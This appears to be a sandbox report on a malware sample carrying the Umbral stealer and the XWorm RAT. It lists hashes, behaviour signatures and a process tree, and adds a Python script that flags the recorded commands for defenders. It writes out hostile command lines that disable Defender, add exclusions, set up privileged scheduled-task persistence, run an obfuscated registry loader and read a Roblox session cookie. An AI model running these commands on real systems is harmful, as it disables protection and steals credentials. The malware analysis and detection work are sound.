memory/376-132-0x0000000140000000-0x0000000140008000-memory.dmp

memory/376-131-0x0000000140000000-0x0000000140008000-memory.dmp

memory/612-152-0x0000019246950000-0x000001924697C000-memory.dmp

memory/612-153-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/672-164-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/968-175-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/384-186-0x00007FF8AC310000-0x00007FF8AC320000-memory.dmp

memory/384-185-0x000001D4EBFC0000-0x000001D4EBFEC000-memory.dmp

memory/384-179-0x000001D4EBFC0000-0x000001D4EBFEC000-memory.dmp

memory/700-190-0x000001939AD90000-0x000001939ADBC000-memory.dmp

memory/968-174-0x0000016AE51E0000-0x0000016AE520C000-memory.dmp

memory/968-168-0x0000016AE51E0000-0x0000016AE520C000-memory.dmp

memory/672-163-0x000001843AF50000-0x000001843AF7C000-memory.dmp

memory/672-157-0x000001843AF50000-0x000001843AF7C000-memory.dmp

memory/612-146-0x0000019246950000-0x000001924697C000-memory.dmp

memory/612-145-0x0000019246950000-0x000001924697C000-memory.dmp

memory/612-144-0x0000019246920000-0x0000019246946000-memory.dmp

memory/376-141-0x0000000140000000-0x0000000140008000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3a6928331590eb8c571ec8699fe4d14
SHA1 23a32d273b2e86e8f73b01b9934742589995d3cb
SHA256 a8bd4e37730df218360b07df233d48d06baddd36b6a54999b40cdf769367e9d7
SHA512 72ce1cadca87a3088d7ba3d94727b6945ef52e8b1064a44414b4d5a18650aa750ec7f183844f559980e08155a5de4a3d3ab5aebf878698aee466e21f1964e8e0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 db6e0181ee27d7f1ce5859e2ad04d3dc
SHA1 a4d49da3e66ee7793b96b99d3a2d023e3b1b1687
SHA256 409903c85c510f853755fd3488eac3459133871fdea8f7a11edd1afbfaea34f7
SHA512 06c3cb5811155fbdae919c23a093f17e8266a23a5312c26c14a601e45abb659c563be8bb28fc626619607cd6e721e3161d83b4450ef6622f75a916de62b8af9a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2c8179aaa149c0b9791b73ce44c04d1
SHA1 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff
SHA256 c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a
SHA512 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5fbb56518e82d1b1e5ef6be3b6693880
SHA1 4e7671d0193b6f640d81b3fb91ac17ca67e0632b
SHA256 760d5623e712e53485c80330b3e2567577ffcf9397a94c3085bd1999f4650a40
SHA512 ff2fff83f094820da4157c907be06039dcc58b1a23e867ba58c0c3f40d8bbd90022161dc3d77c082a765f7f4104f683be995b994183d1899c73bd9131fe614d1

memory/3184-1019-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3312-1053-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/1808-1068-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

memory/3312-1078-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/1680-1101-0x0000000000890000-0x00000000008A0000-memory.dmp

memory/3424-1126-0x0000000000F30000-0x0000000000F40000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 01:14

Reported

2024-07-09 01:16

Platform

win7-20240705-en

Max time kernel

149s

Max time network

16s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2600 created 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2600 set thread context of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0d0bc599dd1da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
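
The PowerShell, Run-key and scheduled-task signatures above carry empty Indicator columns, but the behavioral2 process list on this page records the exact command lines behind them: Defender exclusions for every dropped binary, a Set-MpPreference call that switches off real-time, script and IOAV scanning and sample submission, one task that runs the ProgramData payload at logon with highest privileges, and a second task that relaunches XClient.exe every minute from AppData. The Python below is added as a worked example and is not part of the report: it applies the triage rules a responder would run over such a process list and over the Run-key write. The sample command lines are copied from this page (the last, benign task is constructed for contrast); the Run-key value is taken from the signature above with its doubled backslashes unescaped; the category names and thresholds are my own.

```python
import re
from collections import Counter

# Command lines copied from the behavioral2 process list on this page; the final
# line is a constructed benign task that the rules must not flag.
SAMPLE_CMDLINES = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
"wmic.exe" csproduct get uuid
"wmic" path win32_VideoController get name
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
"C:\Windows\System32\schtasks.exe" /Create /TN "NightlyBackup" /SC DAILY /TR "C:\Program Files\Backup\backup.exe"
""".strip().splitlines()

# Registry write copied from the "Adds Run key to start application" signature above.
SAMPLE_RUN_VALUE = (
    r"\REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator",
    r"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe",
)

# Locations an unprivileged user can write to; binaries launched from here by a
# privileged task or autorun are the persistence pattern in this report.
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Temp)\\", re.I)
DISCOVERY_WMI = ("csproduct get uuid", "win32_videocontroller", "os get caption", "totalphysicalmemory")


def triage(cmd):
    """Return a list of (category, detail) findings for one recorded command line."""
    findings = []
    low = cmd.lower()
    if "add-mppreference" in low:
        for kind, val in re.findall(r"-Exclusion(Path|Process)\s+'?([^'\s]+)", cmd, re.I):
            findings.append(("defender_exclusion", f"{kind}: {val}"))
    if "set-mppreference" in low:
        off = re.findall(r"-(Disable\w+)\s+\$true", cmd, re.I)
        off += [f"{k}={v}" for k, v in re.findall(r"-(MAPSReporting|SubmitSamplesConsent)\s+(\S+)", cmd, re.I)]
        if off:
            findings.append(("defender_disabled", ", ".join(off)))
    if "schtasks" in low and "/create" in low:
        name = re.search(r'/tn\s+"?([^"\s]+)', cmd, re.I)
        target = re.search(r'/tr\s+"([^"]+)"', cmd, re.I)
        sched = re.search(r"/sc\s+(\w+)", cmd, re.I)
        every = re.search(r"/mo\s+(\d+)", cmd, re.I)
        tgt = target.group(1) if target else ""
        why = []
        if "/rl highest" in low:
            why.append("highest run level")
        if sched and sched.group(1).lower() == "onlogon":
            why.append("runs at every logon")
        if sched and sched.group(1).lower() == "minute" and every and int(every.group(1)) <= 5:
            why.append(f"re-launched every {every.group(1)} min")
        if USER_WRITABLE.search(tgt):
            why.append("target in user-writable path")
        if why:
            task = name.group(1) if name else "?"
            findings.append(("scheduled_task_persistence", f"{task} -> {tgt}: " + "; ".join(why)))
    if ".roblosecurity" in low:
        findings.append(("credential_access", "reads the Roblox session cookie from the registry"))
    if "wmic" in low and any(k in low for k in DISCOVERY_WMI):
        findings.append(("discovery", cmd.split(None, 1)[1] if " " in cmd else cmd))
    return findings


def triage_run_value(key_path, data):
    """Flag a Run/RunOnce value whose target lives in a user-writable directory."""
    if re.search(r"\\CurrentVersion\\Run(Once)?\\", key_path, re.I) and USER_WRITABLE.search(data):
        name = key_path.rsplit("\\", 1)[-1]
        return [("run_key_persistence", f"{name} -> {data}")]
    return []


def summarize(cmdlines):
    """Count findings per category across a whole process list."""
    return Counter(cat for cmd in cmdlines for cat, _ in triage(cmd))


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for cat, detail in triage(line):
            print(f"{cat:28} {detail}")
    print(triage_run_value(*SAMPLE_RUN_VALUE))
    print(dict(summarize(SAMPLE_CMDLINES)))
```

The rules deliberately key on arguments rather than image names, so the same logic works on Sysmon event 1 or 4688 command lines; the one-minute `/sc minute /mo 1` task is worth its own alert because it is a watchdog that restarts the RAT after a kill, not ordinary persistence.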

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1988 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1988 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1988 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 1988 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1988 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1988 wrote to memory of 780 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1988 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1988 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 1988 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2240 wrote to memory of 2600 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2240 wrote to memory of 2600 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2240 wrote to memory of 2600 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2600 wrote to memory of 2340 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2340 wrote to memory of 432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2340 wrote to memory of 480 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\services.exe
PID 2340 wrote to memory of 488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2340 wrote to memory of 496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsm.exe
PID 2340 wrote to memory of 612 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 692 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 772 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2340 wrote to memory of 820 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 612 wrote to memory of 448 (3 events) N/A C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2340 wrote to memory of 448 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2340 wrote to memory of 864 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 976 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 284 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 492 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 2340 wrote to memory of 1040 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 1120 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhost.exe
PID 2340 wrote to memory of 1188 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\Dwm.exe
PID 2340 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 2340 wrote to memory of 1404 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 2340 wrote to memory of 1736 N/A C:\Windows\System32\dllhost.exe C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
PID 2340 wrote to memory of 832 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2340 wrote to memory of 2560 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2340 wrote to memory of 1924 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sppsvc.exe
PID 2340 wrote to memory of 2976 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2340 wrote to memory of 780 N/A C:\Windows\System32\dllhost.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2340 wrote to memory of 2240 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskeng.exe
PID 2340 wrote to memory of 2600 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2340 wrote to memory of 2596 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\conhost.exe
PID 2340 wrote to memory of 448 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {98CBFCCB-028E-4AA4-944D-BD5B9581CD23} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+'st'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-5051511122106885354-846861541234880637129283130861032109-929670289-1544716396"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{ba3e326a-1696-43fe-90a8-83710c76090d}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp

Files

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9
